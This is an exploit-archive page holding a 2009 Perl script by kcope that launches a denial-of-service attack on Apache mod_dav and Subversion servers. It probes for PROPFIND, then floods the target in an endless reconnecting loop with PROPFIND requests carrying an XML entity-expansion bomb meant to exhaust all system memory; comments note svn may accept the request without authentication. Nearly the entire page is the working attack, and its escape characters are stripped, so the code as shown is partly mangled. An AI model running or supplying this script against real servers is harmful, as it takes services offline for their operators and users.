Apache mod_dav / svn Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Apache mod_dav / svn Remote Denial of Service Exploit
# Published : 2009-06-01
# Author : kcope
# Previous Title : AIMP 2.51 build 330 (ID3v1/ID3v2 Tag) Remote Stack BOF PoC (SEH)
# Next Title : Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit

###furoffyourcat.pl
### Apache mod_dav / svn Remote Denial of Service Exploit
### by kcope / June 2009
###
### Will exhaust all system memory
### Needs Authentication on normal DAV
###
### This can be especially serious stuff when used against
### svn (subversion) servers!! Svn might let the PROPFIND slip through
### without authentication. bwhahaaha :o)
### use at your own risk!
##################################################################

use IO::Socket;
use MIME::Base64;

sub usage {
	print "Apache mod_dav / svn Remote Denial of Service Exploitn";
	print "by kcope in 2009n";
	print "usage: perl furoffyourcat.pl <remotehost> <webdav folder> [username] [password]n";
	print "example: perl furoffyourcat.pl svn.XXX.com /projects/n";exit;
}

if ($#ARGV < 1) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];

$username = $ARGV[2];
$password = $ARGV[3];
                            
$|=1;

$BasicAuth = encode_base64("$username:$password");
chomp $BasicAuth;

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp');
print $sock "PROPFIND $webdavfile HTTP/1.1rn";
print $sock "Host: $hostnamern";
print $sock "Depth: 0rn";
print $sock "Connection: closern";
if ($username ne "") {
print $sock "Authorization: Basic $BasicAuthrn";	
}
print $sock "rn";
$x = <$sock>;	

print $x;
if (!($x =~ /207/)) {
while(<$sock>) {
	print;	
}
close($sock);
 print "No PROPFIND on this server and path.n";
 exit(0);	
}

$a = "";
for ($i=1;$i<256;$i++) {		# Here you can increase the XML bomb count
	$k = $i-1;
	$a .= "<!ENTITY x$i "&x$k;&x$k;">n"
}

$igzml = 
"<?xml version="1.0"?>n"
."<!DOCTYPE REMOTE [n"
."<!ELEMENT REMOTE ANY>n"
."<!ENTITY x0 "foobar">n"
.$a
."]>n"
."<REMOTE>n"
."&x$k;n"
."</REMOTE>n";

print "Apache mod_dav / svn Remote Denial of Service Exploitn";
print "by kcope in 2009n";
print "Launching DoS Attack...n";

$ExploitRequest =
 "PROPFIND $webdavfile HTTP/1.1rn"
."Host: $hostnamern"
."Depth: 0rn";

if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuthrn";	
}
$ExploitRequest .= "Content-Type: text/xmlrnContent-Length: ".length($igzml)."rnrn" . $igzml;

while(1) {
again:
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp') || (goto again);

print $sock $ExploitRequest;
print ";Pp";
}

# www.Syue.com [2009-06-01]